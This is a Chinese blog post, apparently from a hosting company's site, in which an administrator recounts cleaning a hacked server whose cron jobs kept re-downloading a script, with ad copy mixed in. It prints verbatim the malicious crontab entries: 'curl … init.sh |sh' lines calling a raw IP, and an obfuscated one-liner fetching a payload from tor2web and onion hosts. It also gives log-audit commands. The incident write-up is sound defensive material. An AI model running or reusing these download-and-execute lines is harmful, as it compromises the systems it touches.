現(xiàn)象：



安裝成功了

公司主營(yíng)業(yè)務(wù)：網(wǎng)站制作、成都做網(wǎng)站、移動(dòng)網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳，提高企業(yè)的競(jìng)爭(zhēng)能力。成都創(chuàng)新互聯(lián)公司是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化，感謝他們對(duì)我們的高要求，感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn)，讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來驚喜。成都創(chuàng)新互聯(lián)公司推出庫倫免費(fèi)做網(wǎng)站回饋大家。

但是沒多久又進(jìn)來了

而且至今登錄到系統(tǒng)來了

[root@izd7oc0a0u64q75bim8bu8z ~]# tail /var/log/cron
\Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cur) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5724]: (root) CMD (echo 111 >> /home/test.txt)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5723]: (nobody) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5726]: (nginx) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5725]: (apache) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5720]: (nginx) MAIL (mailed 32 bytes of output but got status 0x004b#012)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5718]: (nobody) MAIL (mailed 32 byte

[root@izd7oc0a0u64q75bim8bu8z tmp]# cat /etc/crontab
/13 root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to " && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.|timesync.su|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://7xffbbbebumizpeg";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm2";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

每分鐘 nobody nginx apache用戶 執(zhí)行一次 下載腳本運(yùn)行
干掉這個(gè)腳本，然后停止了crond服務(wù) 在var/log/cronrizhikli日志里面就沒有異常下載腳本

還有這個(gè)異常

發(fā)現(xiàn)這里也有用戶

打開crontab就一直在下載一分鐘執(zhí)行一次
guoran果斷刪了 apache 和nobody 只剩下nginx一個(gè)在下載 但是 crontab -l也沒發(fā)現(xiàn)啥異常
做最后終于找到惡意用戶位置


直接全部刪掉只留下root 最后恢復(fù)正常了

以后要重點(diǎn)關(guān)注登錄系統(tǒng)用戶情況
more /var/log/secure |grep Accepted
查詢登錄頻繁用戶
awk '/Failed password/ {print $(NF-3)}' /var/log/secure |sort -n |uniq -c|sort -n |tail

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn，海內(nèi)外云服務(wù)器15元起步，三天無理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。

網(wǎng)頁名稱：服務(wù)器crontab異常，疑是gongjiCPU異常-創(chuàng)新互聯(lián)
分享網(wǎng)址：http://weahome.cn/article/digjch.html